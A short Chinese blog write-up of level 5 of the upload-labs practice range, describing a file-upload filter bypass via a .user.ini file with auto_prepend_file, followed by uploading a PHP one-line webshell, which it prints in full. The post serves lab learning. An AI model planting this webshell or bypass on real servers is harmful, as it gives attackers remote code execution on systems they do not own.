upload-labs关卡记录5

这一关,卡了好久,这里我的靶场的源代码,和我看别的师傅发的不一样,我的这里的源码带有小写转换:

是不能通过大小写进行绕过,最后找到这个师傅的文章:upload-labs通关-CSDN博客

这里第五关用到的方法,可以进行绕过,原理师傅讲的也很清晰,原理类似于之前的.htaccess绕过,通过添加配置文件。然后再上传一句话木马来进行实现:

就是将这里的代码:auto_prepend_file=1.txt

写进命名为.user.ini的文件中,然后上传这个文件,然后再上传命名为1.txt的文件。这时进入url为:upload-labs:8899/upload/readme.php

然后再使用hackbar来执行刚才上传的一句话木马,就是写进1.txt的一句话木马。

我这里的一句话木马为:<?php @eval($_POST['pw']); ?>

相关推荐
偶尔贪玩的骑士5 小时前
Kioptrix Level 1渗透测试
linux·开发语言·网络安全·php
迎風吹頭髮6 小时前
Linux服务器编程实践58-getnameinfo函数:通过socket地址获取主机名与服务名
开发语言·数据库·php
探索宇宙真理.7 小时前
WordPress Flex QR Code Generator文件上传 | CVE-2025-10041 复现&研究
经验分享·php·安全漏洞
PFinal社区_南丞8 小时前
构建可维护的正则表达式系统-pfinal-regex-center设计与实现
后端·php
这儿有一堆花8 小时前
一次渗透测试的全过程:从扫描到提权
web安全·网络安全·web
wearegogog1238 小时前
负荷聚类及其在MATLAB中的实现
matlab·php·聚类
风语者日志8 小时前
CTFSHOW—WEB4
网络·安全·web安全·网络安全·ctf
BingoGo9 小时前
PHP 8.5 新特性 闭包可以作为常量表达式了
后端·php
JaguarJack11 小时前
PHP 8.5 新特性 闭包可以作为常量表达式了
后端·php
Andya_net21 小时前
网络安全 | 深入了解 X.509 证书及其应用
服务器·安全·web安全